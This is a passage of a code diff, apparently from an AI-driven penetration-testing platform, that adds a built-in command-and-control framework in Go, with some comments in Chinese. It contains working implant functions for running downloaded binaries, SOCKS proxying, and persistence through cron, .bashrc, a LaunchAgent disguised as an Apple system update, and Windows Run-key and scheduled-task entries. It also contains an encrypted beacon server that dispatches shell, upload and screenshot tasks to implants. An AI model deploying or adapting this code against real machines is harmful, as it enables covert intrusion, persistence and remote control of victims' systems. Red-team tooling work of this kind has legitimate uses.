+ + // Success reply + conn.Write([]byte{0x05, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + + done := make(chan struct{}, 2) + go func() { io.Copy(remote, conn); done <- struct{}{} }() + go func() { io.Copy(conn, remote); done <- struct{}{} }() + <-done +} + +// --- Load Assembly (in-memory exec) --- + +func taskLoadAssembly(payload map[string]interface{}) (string, string, string, string) { + b64Data, _ := payload["data"].(string) + args, _ := payload["args"].(string) + + if b64Data == "" { + fileID, _ := payload["file_id"].(string) + if fileID == "" { + return "", "", "", "data (base64) or file_id required" + } + asm, err := fetchC2FileByID(fileID) + if err != nil { + return "", "", "", err.Error() + } + b64Data = base64.StdEncoding.EncodeToString(asm) + } + + data, err := base64.StdEncoding.DecodeString(b64Data) + if err != nil { + return "", "", "", "decode assembly: " + err.Error() + } + + tmpDir := os.TempDir() + tmpFile := filepath.Join(tmpDir, fmt.Sprintf(".cs_%d", time.Now().UnixNano())) + if runtime.GOOS == "windows" { + tmpFile += ".exe" + } + if err := os.WriteFile(tmpFile, data, 0700); err != nil { + return "", "", "", err.Error() + } + defer os.Remove(tmpFile) + + cmdArgs := []string{} + if args != "" { + cmdArgs = strings.Fields(args) + } + cmd := exec.Command(tmpFile, cmdArgs...) + cwdMu.Lock() + cmd.Dir = currentCwd + cwdMu.Unlock() + + out, err := cmd.CombinedOutput() + if err != nil { + return string(out), "", "", err.Error() + } + return string(out), "", "", "" +} + +// --- Persistence --- + +func taskPersist(payload map[string]interface{}) (string, string, string, string) { + method, _ := payload["method"].(string) + if method == "" { + method = "auto" + } + exe := exeSelf() + if exe == "" || exe == "unknown" { + return "", "", "", "cannot determine self path" + } + + switch runtime.GOOS { + case "linux": + return persistLinux(exe, method) + case "darwin": + return persistDarwin(exe, method) + case "windows": + return persistWindows(exe, method) + default: + return "", "", "", "persistence not supported on " + runtime.GOOS + } +} + +func persistLinux(exe, method string) (string, string, string, string) { + if method == "auto" || method == "cron" { + cronEntry := fmt.Sprintf("@reboot %s &\n", exe) + out, err := runWithTimeout(fmt.Sprintf("(crontab -l 2>/dev/null; echo '%s') | sort -u | crontab -", strings.TrimSpace(cronEntry)), 10) + if err == nil { + return "persistence installed via cron: " + out, "", "", "" + } + } + if method == "auto" || method == "bashrc" { + line := fmt.Sprintf("\n(nohup %s &>/dev/null &) # cs\n", exe) + home, _ := os.UserHomeDir() + if home != "" { + f, err := os.OpenFile(filepath.Join(home, ".bashrc"), os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0644) + if err == nil { + f.WriteString(line) + f.Close() + return "persistence installed via .bashrc", "", "", "" + } + } + } + return "", "", "", "persistence failed on linux" +} + +func persistDarwin(exe, method string) (string, string, string, string) { + if method == "auto" || method == "launchagent" { + home, _ := os.UserHomeDir() + if home == "" { + return "", "", "", "cannot determine home dir" + } + plistDir := filepath.Join(home, "Library", "LaunchAgents") + os.MkdirAll(plistDir, 0755) + plist := fmt.Sprintf(` + + + + Labelcom.apple.systemupdate + ProgramArguments%s + RunAtLoad + KeepAlive + StandardOutPath/dev/null + StandardErrorPath/dev/null + +`, exe) + plistPath := filepath.Join(plistDir, "com.apple.systemupdate.plist") + if err := os.WriteFile(plistPath, []byte(plist), 0644); err != nil { + return "", "", "", err.Error() + } + return "persistence installed via LaunchAgent: " + plistPath, "", "", "" + } + return "", "", "", "persistence method not supported on darwin" +} + +func persistWindows(exe, method string) (string, string, string, string) { + if method == "auto" || method == "registry" { + cmd := fmt.Sprintf(`reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemUpdate /t REG_SZ /d "%s" /f`, exe) + out, err := runWithTimeout(cmd, 10) + if err == nil { + return "persistence installed via registry Run key: " + out, "", "", "" + } + } + if method == "auto" || method == "schtasks" { + cmd := fmt.Sprintf(`schtasks /create /tn "SystemUpdate" /tr "%s" /sc onlogon /rl highest /f`, exe) + out, err := runWithTimeout(cmd, 10) + if err == nil { + return "persistence installed via schtasks: " + out, "", "", "" + } + } + return "", "", "", "persistence failed on windows" +} + +func getFloat(m map[string]interface{}, key string) float64 { + v, _ := m[key].(float64) + return v +} diff --git a/c2/session_watchdog.go b/c2/session_watchdog.go new file mode 100644 index 00000000..328f1f32 --- /dev/null +++ b/c2/session_watchdog.go @@ -0,0 +1,109 @@ +package c2 + +import ( + "context" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// SessionWatchdog 会话心跳看门狗:周期扫描所有 active/sleeping 会话, +// 把超过 (sleep * (1 + jitter%) * graceFactor + minGrace) 仍未心跳的标为 dead。 +// +// 设计要点: +// - 单 goroutine + ticker,避免对每个会话开 timer,session 数量大时也线性 OK; +// - 阈值随会话自身 sleep/jitter 自适应(sleep=300s 的会话不能用 sleep=5s 的判定); +// - 全局最小宽限期 minGrace 避免 sleep 配置错误的会话被误判; +// - 不读 implant_uuid,纯按 last_check_in 字段,与 listener 类型解耦。 +type SessionWatchdog struct { + manager *Manager + logger *zap.Logger + interval time.Duration // 扫描周期,默认 15s + minGrace time.Duration // 最小宽限期,默认 30s + gracePct float64 // 心跳超时倍数,默认 3.0(即 3 倍 sleep 周期没心跳算掉线) + stopCh chan struct{} +} + +// NewSessionWatchdog 创建看门狗 +func NewSessionWatchdog(m *Manager) *SessionWatchdog { + return &SessionWatchdog{ + manager: m, + logger: m.Logger().With(zap.String("component", "c2-watchdog")), + interval: 15 * time.Second, + minGrace: 30 * time.Second, + gracePct: 3.0, + stopCh: make(chan struct{}), + } +} + +// Run 阻塞执行,直到 ctx.Done() 或 Stop() +func (w *SessionWatchdog) Run(ctx context.Context) { + t := time.NewTicker(w.interval) + defer t.Stop() + for { + select { + case <-ctx.Done(): + return + case <-w.stopCh: + return + case <-t.C: + w.tick() + } + } +} + +// Stop 停止 +func (w *SessionWatchdog) Stop() { + select { + case <-w.stopCh: + default: + close(w.stopCh) + } +} + +func (w *SessionWatchdog) tick() { + now := time.Now() + for _, status := range []string{string(SessionActive), string(SessionSleeping)} { + sessions, err := w.manager.DB().ListC2Sessions(database.ListC2SessionsFilter{Status: status}) + if err != nil { + w.logger.Warn("watchdog 列表查询失败", zap.Error(err)) + continue + } + for _, s := range sessions { + if w.isStale(s, now) { + if err := w.manager.MarkSessionDead(s.ID); err != nil { + w.logger.Warn("标记会话掉线失败", zap.String("session_id", s.ID), zap.Error(err)) + } + } + } + } +} + +// isStale 判断会话是否超时 +func (w *SessionWatchdog) isStale(s *database.C2Session, now time.Time) bool { + // 无心跳记录:以 first_seen_at 兜底 + last := s.LastCheckIn + if last.IsZero() { + last = s.FirstSeenAt + } + sleep := s.SleepSeconds + if sleep <= 0 { + // TCP reverse 模式 sleep=0 → 用最小宽限期判定 + return now.Sub(last) > w.minGrace*2 + } + jitter := s.JitterPercent + if jitter < 0 { + jitter = 0 + } + if jitter > 100 { + jitter = 100 + } + // 阈值 = sleep * (1 + jitter%) * gracePct,再加 minGrace 兜底 + expected := time.Duration(float64(sleep)*(1+float64(jitter)/100.0)*w.gracePct) * time.Second + if expected < w.minGrace { + expected = w.minGrace + } + return now.Sub(last) > expected +} diff --git a/c2/tcp_beacon_server.go b/c2/tcp_beacon_server.go new file mode 100644 index 00000000..63803b32 --- /dev/null +++ b/c2/tcp_beacon_server.go @@ -0,0 +1,267 @@ +package c2 + +import ( + "bufio" + "crypto/subtle" + "encoding/base64" + "encoding/binary" + "encoding/json" + "fmt" + "io" + "net" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。 +const tcpBeaconMagic = "CSB1" + +// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。 +const tcpBeaconMaxFrame = 64 << 20 + +func readTCPBeaconFrame(r *bufio.Reader) (cipherB64 string, err error) { + var n uint32 + if err = binary.Read(r, binary.BigEndian, &n); err != nil { + return "", err + } + if n == 0 || int64(n) > int64(tcpBeaconMaxFrame) { + return "", fmt.Errorf("invalid tcp beacon frame size") + } + buf := make([]byte, n) + if _, err = io.ReadFull(r, buf); err != nil { + return "", err + } + return string(buf), nil +} + +func writeTCPBeaconFrame(mu *sync.Mutex, conn net.Conn, cipherB64 string) error { + if mu != nil { + mu.Lock() + defer mu.Unlock() + } + payload := []byte(cipherB64) + if len(payload) > tcpBeaconMaxFrame { + return fmt.Errorf("frame too large") + } + var hdr [4]byte + binary.BigEndian.PutUint32(hdr[:], uint32(len(payload))) + if _, err := conn.Write(hdr[:]); err != nil { + return err + } + _, err := conn.Write(payload) + return err +} + +func tcpBeaconCheckToken(expected, got string) bool { + if got == "" || expected == "" { + return false + } + return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1 +} + +// handleTCPBeaconSession 处理已消费魔数 CSB1 之后的 TCP Beacon 会话(与 HTTP Beacon 相同的 AES-GCM + JSON 语义)。 +func (l *TCPReverseListener) handleTCPBeaconSession(conn net.Conn, br *bufio.Reader) { + var writeMu sync.Mutex + defer func() { + _ = conn.Close() + }() + + for { + _ = conn.SetReadDeadline(time.Now().Add(6 * time.Minute)) + cipherB64, err := readTCPBeaconFrame(br) + if err != nil { + if err != io.EOF && !isClosedConnErr(err) { + l.logger.Debug("tcp beacon read frame", zap.Error(err)) + } + return + } + plain, err := DecryptAESGCM(l.rec.EncryptionKey, cipherB64) + if err != nil { + l.logger.Warn("tcp beacon decrypt failed", zap.Error(err)) + return + } + + var env map[string]json.RawMessage + if err := json.Unmarshal(plain, &env); err != nil { + l.logger.Warn("tcp beacon json", zap.Error(err)) + return + } + opBytes, ok := env["op"] + if !ok { + return + } + var op string + if err := json.Unmarshal(opBytes, &op); err != nil { + return + } + var token string + if tb, ok := env["token"]; ok { + _ = json.Unmarshal(tb, &token) + } + if !tcpBeaconCheckToken(l.rec.ImplantToken, token) { + l.logger.Warn("tcp beacon bad token", zap.String("listener_id", l.rec.ID)) + return + } + + var resp interface{} + switch op { + case "check_in": + rawCheck, ok := env["check"] + if !ok { + return + } + var req ImplantCheckInRequest + if err := json.Unmarshal(rawCheck, &req); err != nil { + return + } + if req.UserAgent == "" { + req.UserAgent = "tcp_beacon" + } + if req.SleepSeconds <= 0 { + req.SleepSeconds = l.cfg.DefaultSleep + } + host, _, _ := net.SplitHostPort(conn.RemoteAddr().String()) + if req.Metadata == nil { + req.Metadata = map[string]interface{}{} + } + req.Metadata["transport"] = "tcp_beacon" + req.Metadata["remote"] = conn.RemoteAddr().String() + if strings.TrimSpace(req.InternalIP) == "" { + req.InternalIP = host + } + session, err := l.manager.IngestCheckIn(l.rec.ID, req) + if err != nil { + l.logger.Warn("tcp beacon check_in", zap.Error(err)) + return + } + queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{ + SessionID: session.ID, + Status: string(TaskQueued), + Limit: 1, + }) + resp = ImplantCheckInResponse{ + SessionID: session.ID, + NextSleep: session.SleepSeconds, + NextJitter: session.JitterPercent, + HasTasks: len(queued) > 0, + ServerTime: NowUnixMillis(), + } + + case "tasks": + rawSID, ok := env["session_id"] + if !ok { + return + } + var sessionID string + if err := json.Unmarshal(rawSID, &sessionID); err != nil || sessionID == "" { + return + } + sess, err := l.manager.DB().GetC2Session(sessionID) + if err != nil || sess == nil || sess.ListenerID != l.rec.ID { + return + } + envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50) + if err != nil { + return + } + if envelopes == nil { + envelopes = []TaskEnvelope{} + } + resp = map[string]interface{}{"tasks": envelopes} + + case "result": + raw, ok := env["result"] + if !ok { + return + } + var report TaskResultReport + if err := json.Unmarshal(raw, &report); err != nil { + return + } + if err := l.manager.IngestTaskResult(report); err != nil { + return + } + resp = map[string]string{"ok": "1"} + + case "upload": + raw, ok := env["upload"] + if !ok { + return + } + var up struct { + TaskID string `json:"task_id"` + DataB64 string `json:"data_b64"` + } + if err := json.Unmarshal(raw, &up); err != nil || up.TaskID == "" { + return + } + plainFile, err := base64.StdEncoding.DecodeString(up.DataB64) + if err != nil { + return + } + dir := filepath.Join(l.manager.StorageDir(), "uploads") + if err := os.MkdirAll(dir, 0o755); err != nil { + return + } + dst := filepath.Join(dir, up.TaskID+".bin") + if err := os.WriteFile(dst, plainFile, 0o644); err != nil { + return + } + resp = map[string]interface{}{"ok": 1, "size": len(plainFile)} + + case "file": + raw, ok := env["file"] + if !ok { + return + } + var fr struct { + FileID string `json:"file_id"` + } + if err := json.Unmarshal(raw, &fr); err != nil || fr.FileID == "" { + return + } + if strings.Contains(fr.FileID, "/") || strings.Contains(fr.FileID, "\\") || strings.Contains(fr.FileID, "..") { + return + } + fpath := filepath.Join(l.manager.StorageDir(), "downstream", fr.FileID+".bin") + absPath, err := filepath.Abs(fpath) + if err != nil { + return + } + absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream")) + if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) { + return + } + data, err := os.ReadFile(absPath) + if err != nil { + return + } + resp = map[string]interface{}{ + "file_data": base64Encode(data), + } + + default: + return + } + + body, err := json.Marshal(resp) + if err != nil { + return + } + enc, err := EncryptAESGCM(l.rec.EncryptionKey, body) + if err != nil { + return + } + _ = conn.SetWriteDeadline(time.Now().Add(3 * time.Minute)) + if err := writeTCPBeaconFrame(&writeMu, conn, enc); err != nil { + return + } + } +} diff --git a/c2/types.go b/c2/types.go new file mode 100644 index 00000000..6025671b --- /dev/null +++ b/c2/types.go @@ -0,0 +1,258 @@ +// Package c2 实现 CyberStrikeAI 内置 C2(Command & Control)框架。 +// +// 设计概述: +// - Manager 作为统一入口,被 internal/app 实例化并注入到所有需要操控 C2 的组件 +// (HTTP handler、MCP 工具、HITL 桥、攻击链记录器等)。 +// - Listener 是抽象接口,下挂 tcp_reverse / http_beacon / https_beacon / websocket +// 等不同传输方式的具体实现,全部通过 listener.Registry 工厂创建。 +// - 任务调度走数据库(c2_tasks 表)+ 内存事件总线(EventBus)混合: +// * 状态变化与历史记录靠 SQLite 实现持久化与重启恢复; +// * 高频实时通知(如新任务结果)通过 EventBus 推送给 SSE/WS 订阅者,避免轮询。 +// - Crypto 层固定 AES-256-GCM,每个 Listener 独立 32 字节密钥;密钥仅服务端持有 +// 和编译期注入到 implant,事件流不允许导出明文密钥。 +package c2 + +import ( + "errors" + "strings" + "time" +) + +// ListenerType 监听器类型,与 c2_listeners.type 字段一致 +type ListenerType string + +const ( + ListenerTypeTCPReverse ListenerType = "tcp_reverse" + ListenerTypeHTTPBeacon ListenerType = "http_beacon" + ListenerTypeHTTPSBeacon ListenerType = "https_beacon" + ListenerTypeWebSocket ListenerType = "websocket" +) + +// AllListenerTypes 列出所有受支持的监听器类型,便于校验与前端枚举 +func AllListenerTypes() []ListenerType { + return []ListenerType{ + ListenerTypeTCPReverse, + ListenerTypeHTTPBeacon, + ListenerTypeHTTPSBeacon, + ListenerTypeWebSocket, + } +} + +// IsValidListenerType 校验前端/MCP 入参是否为合法 type +func IsValidListenerType(t string) bool { + t = strings.ToLower(strings.TrimSpace(t)) + for _, lt := range AllListenerTypes() { + if string(lt) == t { + return true + } + } + return false +} + +// SessionStatus 与 c2_sessions.status 一致 +type SessionStatus string + +const ( + SessionActive SessionStatus = "active" + SessionSleeping SessionStatus = "sleeping" + SessionDead SessionStatus = "dead" + SessionKilled SessionStatus = "killed" +) + +// TaskStatus 与 c2_tasks.status 一致 +type TaskStatus string + +const ( + TaskQueued TaskStatus = "queued" + TaskSent TaskStatus = "sent" + TaskRunning TaskStatus = "running" + TaskSuccess TaskStatus = "success" + TaskFailed TaskStatus = "failed" + TaskCancelled TaskStatus = "cancelled" +) + +// TaskType 任务类型(与 beacon 端协商,避免硬编码字符串) +type TaskType string + +const ( + // 通用任务 + TaskTypeExec TaskType = "exec" // 执行任意命令(shell -c) + TaskTypeShell TaskType = "shell" // 交互式命令(保持 cwd) + TaskTypePwd TaskType = "pwd" // 当前目录 + TaskTypeCd TaskType = "cd" // 切目录 + TaskTypeLs TaskType = "ls" // 列目录 + TaskTypePs TaskType = "ps" // 列进程 + TaskTypeKillProc TaskType = "kill_proc" // 杀进程 + TaskTypeUpload TaskType = "upload" // 推文件到目标 + TaskTypeDownload TaskType = "download" // 拉文件回本机 + TaskTypeScreenshot TaskType = "screenshot" // 截图 + TaskTypeSleep TaskType = "sleep" // 调整心跳节律 + TaskTypeExit TaskType = "exit" // 让 implant 退出(不会自删二进制) + TaskTypeSelfDelete TaskType = "self_delete" // 退出 + 自删二进制(持久化清理) + // 高级任务 + TaskTypePortFwd TaskType = "port_fwd" + TaskTypeSocksStart TaskType = "socks_start" + TaskTypeSocksStop TaskType = "socks_stop" + TaskTypeLoadAssembly TaskType = "load_assembly" + TaskTypePersist TaskType = "persist" +) + +// AllTaskTypes 全部 task_type,便于工具 schema 列出 enum +func AllTaskTypes() []TaskType { + return []TaskType{ + TaskTypeExec, TaskTypeShell, + TaskTypePwd, TaskTypeCd, TaskTypeLs, TaskTypePs, TaskTypeKillProc, + TaskTypeUpload, TaskTypeDownload, TaskTypeScreenshot, + TaskTypeSleep, TaskTypeExit, TaskTypeSelfDelete, + TaskTypePortFwd, TaskTypeSocksStart, TaskTypeSocksStop, TaskTypeLoadAssembly, + TaskTypePersist, + } +} + +// IsDangerousTaskType 标记需要 HITL 二次确认的任务类型; +// 与 internal/handler/hitl.go 现有的 tool_whitelist 概念呼应:白名单外 → 走审批。 +func IsDangerousTaskType(t TaskType) bool { + switch t { + case TaskTypeKillProc, TaskTypeUpload, TaskTypeSelfDelete, + TaskTypePortFwd, TaskTypeSocksStart, TaskTypeLoadAssembly, TaskTypePersist: + return true + } + return false +} + +// ListenerConfig 解码后的监听器运行配置(来自 c2_listeners.config_json) +type ListenerConfig struct { + // HTTP/HTTPS Beacon 公共字段 + BeaconCheckInPath string `json:"beacon_check_in_path,omitempty"` // 默认 "/check_in" + BeaconTasksPath string `json:"beacon_tasks_path,omitempty"` // 默认 "/tasks" + BeaconResultPath string `json:"beacon_result_path,omitempty"` // 默认 "/result" + BeaconUploadPath string `json:"beacon_upload_path,omitempty"` // 默认 "/upload" + BeaconFilePath string `json:"beacon_file_path,omitempty"` // 默认 "/file/" + // HTTPS 专属 + TLSCertPath string `json:"tls_cert_path,omitempty"` + TLSKeyPath string `json:"tls_key_path,omitempty"` + TLSAutoSelfSign bool `json:"tls_auto_self_sign,omitempty"` // true:找不到证书时自动生成自签 + // 客户端默认参数(写到 c2_sessions 初值,beacon 也可在 check-in 时覆写) + DefaultSleep int `json:"default_sleep,omitempty"` // 秒,默认 5 + DefaultJitter int `json:"default_jitter,omitempty"` // 0-100,默认 0 + // OPSEC:可选命令黑名单(正则) + CommandDenyRegex []string `json:"command_deny_regex,omitempty"` + // 任务并发上限(每个会话同时下发的最大任务数,0 表示不限制) + MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"` + // CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景 + CallbackHost string `json:"callback_host,omitempty"` +} + +// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值 +func (c *ListenerConfig) ApplyDefaults() { + if strings.TrimSpace(c.BeaconCheckInPath) == "" { + c.BeaconCheckInPath = "/check_in" + } + if strings.TrimSpace(c.BeaconTasksPath) == "" { + c.BeaconTasksPath = "/tasks" + } + if strings.TrimSpace(c.BeaconResultPath) == "" { + c.BeaconResultPath = "/result" + } + if strings.TrimSpace(c.BeaconUploadPath) == "" { + c.BeaconUploadPath = "/upload" + } + if strings.TrimSpace(c.BeaconFilePath) == "" { + c.BeaconFilePath = "/file/" + } + if c.DefaultSleep <= 0 { + c.DefaultSleep = 5 + } + if c.DefaultJitter < 0 { + c.DefaultJitter = 0 + } + if c.DefaultJitter > 100 { + c.DefaultJitter = 100 + } +} + +// ImplantCheckInRequest beacon → 服务端的注册/心跳请求体(已解密后的明文) +type ImplantCheckInRequest struct { + ImplantUUID string `json:"uuid"` + Hostname string `json:"hostname"` + Username string `json:"username"` + OS string `json:"os"` + Arch string `json:"arch"` + PID int `json:"pid"` + ProcessName string `json:"process_name"` + IsAdmin bool `json:"is_admin"` + InternalIP string `json:"internal_ip"` + UserAgent string `json:"user_agent,omitempty"` + SleepSeconds int `json:"sleep_seconds"` + JitterPercent int `json:"jitter_percent"` + Metadata map[string]interface{} `json:"metadata,omitempty"` +} + +// ImplantCheckInResponse 服务端回执 +type ImplantCheckInResponse struct { + SessionID string `json:"session_id"` + NextSleep int `json:"next_sleep"` + NextJitter int `json:"next_jitter"` + HasTasks bool `json:"has_tasks"` + ServerTime int64 `json:"server_time"` +} + +// TaskEnvelope 服务端 → beacon 的任务派发载体 +type TaskEnvelope struct { + TaskID string `json:"task_id"` + TaskType string `json:"task_type"` + Payload map[string]interface{} `json:"payload"` +} + +// TaskResultReport beacon → 服务端的任务结果回传 +type TaskResultReport struct { + TaskID string `json:"task_id"` + Success bool `json:"success"` + Output string `json:"output,omitempty"` + Error string `json:"error,omitempty"` + BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制 + BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png" + StartedAt int64 `json:"started_at"` + EndedAt int64 `json:"ended_at"` +} + +// CommonError C2 模块统一错误类型,便于 handler 层映射 HTTP 状态码 +type CommonError struct { + Code string + Message string + HTTP int +} + +func (e *CommonError) Error() string { + if e == nil { + return "" + } + return e.Message +} + +// Sentinel errors,便于 errors.Is 比较 +var ( + ErrListenerNotFound = &CommonError{Code: "listener_not_found", Message: "监听器不存在", HTTP: 404} + ErrSessionNotFound = &CommonError{Code: "session_not_found", Message: "会话不存在", HTTP: 404} + ErrTaskNotFound = &CommonError{Code: "task_not_found", Message: "任务不存在", HTTP: 404} + ErrProfileNotFound = &CommonError{Code: "profile_not_found", Message: "Profile 不存在", HTTP: 404} + ErrInvalidInput = &CommonError{Code: "invalid_input", Message: "参数非法", HTTP: 400} + ErrAuthFailed = &CommonError{Code: "auth_failed", Message: "鉴权失败", HTTP: 401} + ErrPortInUse = &CommonError{Code: "port_in_use", Message: "端口已被占用", HTTP: 409} + ErrListenerRunning = &CommonError{Code: "listener_running", Message: "监听器已在运行", HTTP: 409} + ErrListenerStopped = &CommonError{Code: "listener_stopped", Message: "监听器未运行", HTTP: 409} + ErrUnsupportedType = &CommonError{Code: "unsupported_type", Message: "不支持的监听器类型", HTTP: 400} +) + +// SafeBindPort 校验端口范围 +func SafeBindPort(port int) error { + if port < 1 || port > 65535 { + return errors.New("port must be in 1..65535") + } + return nil +} + +// NowUnixMillis 统一时间戳工具 +func NowUnixMillis() int64 { + return time.Now().UnixNano() / int64(time.Millisecond) +} diff --git a/config/config.go b/config/config.go new file mode 100644 index 00000000..08105ab9 --- /dev/null +++ b/config/config.go @@ -0,0 +1,1304 @@ +package config + +import ( + "crypto/rand" + "encoding/base64" + "encoding/hex" + "encoding/json" + "fmt" + "os" + "path/filepath" + "strconv" + "strings" + + "gopkg.in/yaml.v3" +) + +type Config struct { + Version string `yaml:"version,omitempty" json:"version,omitempty"` // 前端显示的版本号,如 v1.3.3 + Server ServerConfig `yaml:"server"` + Log LogConfig `yaml:"log"` + MCP MCPConfig `yaml:"mcp"` + OpenAI OpenAIConfig `yaml:"openai"` + FOFA FofaConfig `yaml:"fofa,omitempty" json:"fofa,omitempty"` + Agent AgentConfig `yaml:"agent"` + Hitl HitlConfig `yaml:"hitl,omitempty" json:"hitl,omitempty"` + Security SecurityConfig `yaml:"security"` + Database DatabaseConfig `yaml:"database"` + Auth AuthConfig `yaml:"auth"` + ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"` + Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"` + C2 C2Config `yaml:"c2,omitempty" json:"c2,omitempty"` // 内置 C2 总开关;未配置时默认启用 + Robots RobotsConfig `yaml:"robots,omitempty" json:"robots,omitempty"` // 企业微信/钉钉/飞书等机器人配置 + RolesDir string `yaml:"roles_dir,omitempty" json:"roles_dir,omitempty"` // 角色配置文件目录(新方式) + Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` // 向后兼容:支持在主配置文件中定义角色 + SkillsDir string `yaml:"skills_dir,omitempty" json:"skills_dir,omitempty"` // Skills配置文件目录 + AgentsDir string `yaml:"agents_dir,omitempty" json:"agents_dir,omitempty"` // 多代理子 Agent Markdown 定义目录(*.md,YAML front matter) + MultiAgent MultiAgentConfig `yaml:"multi_agent,omitempty" json:"multi_agent,omitempty"` +} + +// MultiAgentConfig 基于 CloudWeGo Eino adk/prebuilt 的多代理编排(deep | plan_execute | supervisor,与单 Agent /agent-loop 并存)。 +type MultiAgentConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + RobotUseMultiAgent bool `yaml:"robot_use_multi_agent" json:"robot_use_multi_agent"` // 为 true 时钉钉/飞书/企微机器人走 Eino 多代理 + BatchUseMultiAgent bool `yaml:"batch_use_multi_agent" json:"batch_use_multi_agent"` // 为 true 时批量任务队列中每子任务走 Eino 多代理 + // Orchestration 已弃用:保留仅兼容旧版 config.yaml;编排由聊天/WebShell 请求体 orchestration 决定,未传时按 deep。 + Orchestration string `yaml:"orchestration,omitempty" json:"orchestration,omitempty"` + MaxIteration int `yaml:"max_iteration" json:"max_iteration"` // 主代理 / 执行器最大推理轮次(Deep、Supervisor、plan_execute 的 Executor) + // PlanExecuteLoopMaxIterations plan_execute 模式下 execute↔replan 外层循环上限;0 表示用 Eino 默认 10。 + PlanExecuteLoopMaxIterations int `yaml:"plan_execute_loop_max_iterations,omitempty" json:"plan_execute_loop_max_iterations,omitempty"` + SubAgentMaxIterations int `yaml:"sub_agent_max_iterations" json:"sub_agent_max_iterations"` + WithoutGeneralSubAgent bool `yaml:"without_general_sub_agent" json:"without_general_sub_agent"` + WithoutWriteTodos bool `yaml:"without_write_todos" json:"without_write_todos"` + OrchestratorInstruction string `yaml:"orchestrator_instruction" json:"orchestrator_instruction"` + // OrchestratorInstructionPlanExecute plan_execute 主代理(规划侧)系统提示;非空且 agents/orchestrator-plan-execute.md 正文为空或未存在时生效。不与 Deep 的 orchestrator_instruction 混用。 + OrchestratorInstructionPlanExecute string `yaml:"orchestrator_instruction_plan_execute,omitempty" json:"orchestrator_instruction_plan_execute,omitempty"` + // OrchestratorInstructionSupervisor supervisor 主代理系统提示(transfer/exit 说明仍由运行追加);非空且 agents/orchestrator-supervisor.md 正文为空或未存在时生效。 + OrchestratorInstructionSupervisor string `yaml:"orchestrator_instruction_supervisor,omitempty" json:"orchestrator_instruction_supervisor,omitempty"` + SubAgents []MultiAgentSubConfig `yaml:"sub_agents" json:"sub_agents"` + // SubAgentUserContextMaxRunes caps the user-context supplement appended to task descriptions for sub-agents. + // 0 (default) uses the built-in default of 2000 runes; negative value disables injection entirely. + SubAgentUserContextMaxRunes int `yaml:"sub_agent_user_context_max_runes,omitempty" json:"sub_agent_user_context_max_runes,omitempty"` + // EinoSkills configures CloudWeGo Eino ADK skill middleware + optional local filesystem/execute on DeepAgent. + EinoSkills MultiAgentEinoSkillsConfig `yaml:"eino_skills,omitempty" json:"eino_skills,omitempty"` + // EinoMiddleware wires optional ADK middleware (patchtoolcalls, toolsearch, plantask, reduction) and Deep extras. + EinoMiddleware MultiAgentEinoMiddlewareConfig `yaml:"eino_middleware,omitempty" json:"eino_middleware,omitempty"` + // EinoCallbacks attaches CloudWeGo eino callbacks.InitCallbacks on ADK Runner context (structured logs + optional SSE trace). + EinoCallbacks MultiAgentEinoCallbacksConfig `yaml:"eino_callbacks,omitempty" json:"eino_callbacks,omitempty"` +} + +// MultiAgentEinoCallbacksConfig enables Eino unified callbacks on each ADK agent run (deep / plan_execute / supervisor / eino_single). +// Modes: log_only (zap + optional OTel; no SSE to browser), sse (adds client SSE eino_trace_* when sse_trace_to_client), full (sse rules + stream callback copies closed). +type MultiAgentEinoCallbacksConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + Mode string `yaml:"mode,omitempty" json:"mode,omitempty"` // log_only | sse | full; empty with enabled=true defaults to log_only + // SseTraceToClient when true emits eino_trace_* SSE for UI (use only for admin/debug; nil/false recommended in production). + SseTraceToClient *bool `yaml:"sse_trace_to_client,omitempty" json:"sse_trace_to_client,omitempty"` + // Otel configures OpenTelemetry trace export (independent of mode; exporter none disables export even if enabled). + Otel MultiAgentEinoCallbacksOtelConfig `yaml:"otel,omitempty" json:"otel,omitempty"` + // MaxInputSummaryRunes / MaxOutputSummaryRunes cap text placed in SSE payloads and debug logs (not full payloads). + MaxInputSummaryRunes int `yaml:"max_input_summary_runes,omitempty" json:"max_input_summary_runes,omitempty"` + MaxOutputSummaryRunes int `yaml:"max_output_summary_runes,omitempty" json:"max_output_summary_runes,omitempty"` + // ZapVerbose when true logs input/output summaries at zap.Debug on start/end; false uses Info with short fields only. + ZapVerbose bool `yaml:"zap_verbose,omitempty" json:"zap_verbose,omitempty"` +} + +// MultiAgentEinoCallbacksOtelConfig OpenTelemetry for Eino callback spans (W3C trace in collector / stdout). +type MultiAgentEinoCallbacksOtelConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + ServiceName string `yaml:"service_name,omitempty" json:"service_name,omitempty"` + Exporter string `yaml:"exporter,omitempty" json:"exporter,omitempty"` // none | stdout | otlphttp + OTLPEndpoint string `yaml:"otlp_endpoint,omitempty" json:"otlp_endpoint,omitempty"` // host:port, e.g. localhost:4318 (path /v1/traces) + SampleRatio float64 `yaml:"sample_ratio,omitempty" json:"sample_ratio,omitempty"` // 0–1, default 1.0 +} + +// EinoCallbacksModeEffective returns off | log_only | sse | full. +func (c MultiAgentEinoCallbacksConfig) EinoCallbacksModeEffective() 